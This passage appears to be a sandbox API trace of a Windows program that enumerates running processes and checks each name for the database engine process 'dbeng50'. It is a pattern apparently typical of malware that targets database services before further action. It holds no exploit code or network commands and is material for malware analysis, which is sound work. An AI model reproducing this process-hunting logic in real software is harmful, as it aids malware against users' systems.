cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.965] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3574088 [0095.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3574088, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.965] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.965] StrStrIA (lpFirst="taskhostw.exe", lpSrch="dbeng50") returned 0x0 [0095.965] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0095.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.967] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3574160 [0095.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3574160, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0095.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0095.967] StrStrIA (lpFirst="explorer.exe", lpSrch="dbeng50") returned 0x0 [0095.967] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0095.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.968] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35758a0 [0095.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x35758a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0095.968] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0095.968] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="dbeng50") returned 0x0 [0095.968] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0095.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0095.969] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b2a8 [0095.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b2a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0095.969] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0095.969] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="dbeng50") returned 0x0 [0095.969] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0095.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.970] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35758c0 [0095.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x35758c0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0095.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0095.970] StrStrIA (lpFirst="Memory Compression", lpSrch="dbeng50") returned 0x0 [0095.970] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0095.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0095.972] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3575b40 [0095.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3575b40, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0095.972] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0095.972] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="dbeng50") returned 0x0 [0095.972] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0095.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.973] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35740a0 [0095.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x35740a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0095.973] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0095.973] StrStrIA (lpFirst="SearchUI.exe", lpSrch="dbeng50") returned 0x0 [0095.973] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0095.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.974] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575980 [0095.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3575980, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0095.974] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0095.974] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="dbeng50") returned 0x0 [0095.974] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0095.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.975] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35740b8 [0095.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35740b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0095.975] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0095.975] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="dbeng50") returned 0x0 [0095.975] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0095.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.976] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35741c0 [0095.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x35741c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0095.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0095.977] StrStrIA (lpFirst="pending.exe", lpSrch="dbeng50") returned 0x0 [0095.977] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0095.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0095.981] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356ae98 [0095.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356ae98, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0095.981] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0095.981] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="dbeng50") returned 0x0 [0095.981] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0095.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.982] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575a40 [0095.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3575a40, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0095.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0095.982] StrStrIA (lpFirst="swing prefer.exe", lpSrch="dbeng50") returned 0x0 [0095.982] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0095.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0095.983] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356aec0 [0095.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356aec0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0095.983] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0095.983] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="dbeng50") returned 0x0 [0095.983] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0095.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.984] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575b60 [0095.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3575b60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0095.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0095.985] StrStrIA (lpFirst="nights-attending.exe", lpSrch="dbeng50") returned 0x0 [0095.985] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0095.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.986] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3574208 [0095.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3574208, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0095.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0095.986] StrStrIA (lpFirst="installed.exe", lpSrch="dbeng50") returned 0x0 [0095.986] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0095.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0095.987] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356afb0 [0095.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356afb0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0095.987] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0095.987] StrStrIA (lpFirst="references compounds.exe", lpSrch="dbeng50") returned 0x0 [0095.987] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0095.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.988] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575a80 [0095.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3575a80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0095.988] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0095.988] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="dbeng50") returned 0x0 [0095.989] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0095.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.989] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35758e0 [0095.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x35758e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0095.990] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0095.990] StrStrIA (lpFirst="registered try.exe", lpSrch="dbeng50") returned 0x0 [0095.990] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0095.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.991] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b0c8 [0095.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b0c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0095.991] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0095.991] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="dbeng50") returned 0x0 [0095.991] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0095.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.992] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3574340 [0095.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3574340, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0095.992] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0095.992] StrStrIA (lpFirst="invite.exe", lpSrch="dbeng50") returned 0x0 [0095.992] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0095.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.993] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3574310 [0095.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3574310, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0095.993] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0095.993] StrStrIA (lpFirst="idol.exe", lpSrch="dbeng50") returned 0x0 [0095.993] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0095.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.994] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b0a0 [0095.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356b0a0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0095.994] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0095.994] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="dbeng50") returned 0x0 [0095.994] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0095.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0095.995] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356af10 [0095.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", 